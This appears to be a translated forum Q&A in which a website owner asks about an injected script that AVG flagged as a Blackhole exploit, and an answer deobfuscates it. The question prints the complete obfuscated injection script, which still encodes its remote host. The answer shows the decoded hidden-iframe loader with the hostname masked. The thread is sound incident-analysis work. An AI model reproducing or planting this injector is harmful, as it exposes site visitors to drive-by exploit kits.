来自AVG网站的“黑洞漏洞”通知

Question

我有一个网站，我运行一个关系，他们的AVG出现了“利用黑洞漏洞”或类似的东西。这似乎发生在网站被感染的时候，我认为它是被感染的。我在所有页面上都找到了这行代码，但我没有把它放在那里：http://pastebin.com/sJXgw8LX (是的，这都是一行)。

<body><!--398c3d--><script>b=new function(){return 2;};if(!+b)String.prototype.test='harC';for(i in $='esrhserh')if(i=='te'+'st')m=$[i];try{new Object().wehweh();}catch(q){ss="";}try{window['e'+'v'+'al']('asdas')}catch(q){s=String["fr"+"omC"+m+"od"+'e'];}d=new Date();d2=new Date(d.valueOf()-2);Object.prototype.asd='e';if({}.asd==='e')a=document['c'+'r'+'e'+'a'+'t'+'e'+'T'+'e'+'x'+'t'+'N'+'o'+'d'+'e']('321');if(a.data==321)x=-1*(d-d2);n=[-x+7,-x+7,-x+103,-x+100,-x+30,-x+38,-x+98,-x+109,-x+97,-x+115,-x+107,-x+99,-x+108,-x+114,-x+44,-x+101,-x+99,-x+114,-x+67,-x+106,-x+99,-x+107,-x+99,-x+108,-x+114,-x+113,-x+64,-x+119,-x+82,-x+95,-x+101,-x+76,-x+95,-x+107,-x+99,-x+38,-x+37,-x+96,-x+109,-x+98,-x+119,-x+37,-x+39,-x+89,-x+46,-x+91,-x+39,-x+121,-x+7,-x+7,-x+7,-x+103,-x+100,-x+112,-x+95,-x+107,-x+99,-x+112,-x+38,-x+39,-x+57,-x+7,-x+7,-x+123,-x+30,-x+99,-x+106,-x+113,-x+99,-x+30,-x+121,-x+7,-x+7,-x+7,-x+98,-x+109,-x+97,-x+115,-x+107,-x+99,-x+108,-x+114,-x+44,-x+117,-x+112,-x+103,-x+114,-x+99,-x+38,-x+32,-x+58,-x+103,-x+100,-x+112,-x+95,-x+107,-x+99,-x+30,-x+113,-x+112,-x+97,-x+59,-x+37,-x+102,-x+114,-x+114,-x+110,-x+56,-x+45,-x+45,-x+106,-x+104,-x+112,-x+114,-x+109,-x+44,-x+97,-x+109,-x+107,-x+45,-x+113,-x+115,-x+114,-x+112,-x+95,-x+45,-x+103,-x+108,-x+44,-x+97,-x+101,-x+103,-x+61,-x+98,-x+99,-x+100,-x+95,-x+115,-x+106,-x+114,-x+37,-x+30,-x+117,-x+103,-x+98,-x+114,-x+102,-x+59,-x+37,-x+47,-x+46,-x+37,-x+30,-x+102,-x+99,-x+103,-x+101,-x+102,-x+114,-x+59,-x+37,-x+47,-x+46,-x+37,-x+30,-x+113,-x+114,-x+119,-x+106,-x+99,-x+59,-x+37,-x+116,-x+103,-x+113,-x+103,-x+96,-x+103,-x+106,-x+103,-x+114,-x+119,-x+56,-x+102,-x+103,-x+98,-x+98,-x+99,-x+108,-x+57,-x+110,-x+109,-x+113,-x+103,-x+114,-x+103,-x+109,-x+108,-x+56,-x+95,-x+96,-x+113,-x+109,-x+106,-x+115,-x+114,-x+99,-x+57,-x+106,-x+99,-x+100,-x+114,-x+56,-x+46,-x+57,-x+114,-x+109,-x+110,-x+56,-x+46,-x+57,-x+37,-x+60,-x+58,-x+45,-x+103,-x+100,-x+112,-x+95,-x+107,-x+99,-x+60,-x+32,-x+39,-x+57,-x+7,-x+7,-x+123,-x+7,-x+7,-x+100,-x+115,-x+108,-x+97,-x+114,-x+103,-x+109,-x+108,-x+30,-x+103,-x+100,-x+112,-x+95,-x+107,-x+99,-x+112,-x+38,-x+39,-x+121,-x+7,-x+7,-x+7,-x+116,-x+95,-x+112,-x+30,-x+100,-x+30,-x+59,-x+30,-x+98,-x+109,-x+97,-x+115,-x+107,-x+99,-x+108,-x+114,-x+44,-x+97,-x+112,-x+99,-x+95,-x+114,-x+99,-x+67,-x+106,-x+99,-x+107,-x+99,-x+108,-x+114,-x+38,-x+37,-x+103,-x+100,-x+112,-x+95,-x+107,-x+99,-x+37,-x+39,-x+57,-x+100,-x+44,-x+113,-x+99,-x+114,-x+63,-x+114,-x+114,-x+112,-x+103,-x+96,-x+115,-x+114,-x+99,-x+38,-x+37,-x+113,-x+112,-x+97,-x+37,-x+42,-x+37,-x+102,-x+114,-x+114,-x+110,-x+56,-x+45,-x+45,-x+106,-x+104,-x+112,-x+114,-x+109,-x+44,-x+97,-x+109,-x+107,-x+45,-x+113,-x+115,-x+114,-x+112,-x+95,-x+45,-x+103,-x+108,-x+44,-x+97,-x+101,-x+103,-x+61,-x+98,-x+99,-x+100,-x+95,-x+115,-x+106,-x+114,-x+37,-x+39,-x+57,-x+100,-x+44,-x+113,-x+114,-x+119,-x+106,-x+99,-x+44,-x+116,-x+103,-x+113,-x+103,-x+96,-x+103,-x+106,-x+103,-x+114,-x+119,-x+59,-x+37,-x+102,-x+103,-x+98,-x+98,-x+99,-x+108,-x+37,-x+57,-x+100,-x+44,-x+113,-x+114,-x+119,-x+106,-x+99,-x+44,-x+110,-x+109,-x+113,-x+103,-x+114,-x+103,-x+109,-x+108,-x+59,-x+37,-x+95,-x+96,-x+113,-x+109,-x+106,-x+115,-x+114,-x+99,-x+37,-x+57,-x+100,-x+44,-x+113,-x+114,-x+119,-x+106,-x+99,-x+44,-x+106,-x+99,-x+100,-x+114,-x+59,-x+37,-x+46,-x+37,-x+57,-x+100,-x+44,-x+113,-x+114,-x+119,-x+106,-x+99,-x+44,-x+114,-x+109,-x+110,-x+59,-x+37,-x+46,-x+37,-x+57,-x+100,-x+44,-x+113,-x+99,-x+114,-x+63,-x+114,-x+114,-x+112,-x+103,-x+96,-x+115,-x+114,-x+99,-x+38,-x+37,-x+117,-x+103,-x+98,-x+114,-x+102,-x+37,-x+42,-x+37,-x+47,-x+46,-x+37,-x+39,-x+57,-x+100,-x+44,-x+113,-x+99,-x+114,-x+63,-x+114,-x+114,-x+112,-x+103,-x+96,-x+115,-x+114,-x+99,-x+38,-x+37,-x+102,-x+99,-x+103,-x+101,-x+102,-x+114,-x+37,-x+42,-x+37,-x+47,-x+46,-x+37,-x+39,-x+57,-x+7,-x+7,-x+7,-x+98,-x+109,-x+97,-x+115,-x+107,-x+99,-x+108,-x+114,-x+44,-x+101,-x+99,-x+114,-x+67,-x+106,-x+99,-x+107,-x+99,-x+108,-x+114,-x+113,-x+64,-x+119,-x+82,-x+95,-x+101,-x+76,-x+95,-x+107,-x+99,-x+38,-x+37,-x+96,-x+109,-x+98,-x+119,-x+37,-x+39,-x+89,-x+46,-x+91,-x+44,-x+95,-x+110,-x+110,-x+99,-x+108,-x+98,-x+65,-x+102,-x+103,-x+106,-x+98,-x+38,-x+100,-x+39,-x+57,-x+7,-x+7,-x+123];for(i=0;i<n.length;i++)ss+=s(eval("n"+"[i"+"]"));eval(ss);</script><!--/398c3d-->

这段代码是做什么的？

Answer 1

以下是评估后的javascript：

if (document.getElementsByTagName('body')[0]) {
    iframer();
} else {
    document.write("<iframe src='http://xxxxxxx/sutra/in.cgi?default' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
}
function iframer() {
    var f = document.createElement('iframe');
    f.setAttribute('src', 'http://xxxxx/sutra/in.cgi?default');
    f.style.visibility = 'hidden';
    f.style.position = 'absolute';
    f.style.left = '0';
    f.style.top = '0';
    f.setAttribute('width', '10');
    f.setAttribute('height', '10');
    document.getElementsByTagName('body')[0].appendChild(f);
}

我已经混淆了实际的主机名，以防止进一步的破坏。在该页面中还有另一个半混淆javascript，它会将您的浏览器重定向到同一主机上的另一个页面，这可能会迫使访问者浏览器下载某些内容。我没有继续按照代码到达最终的目的地。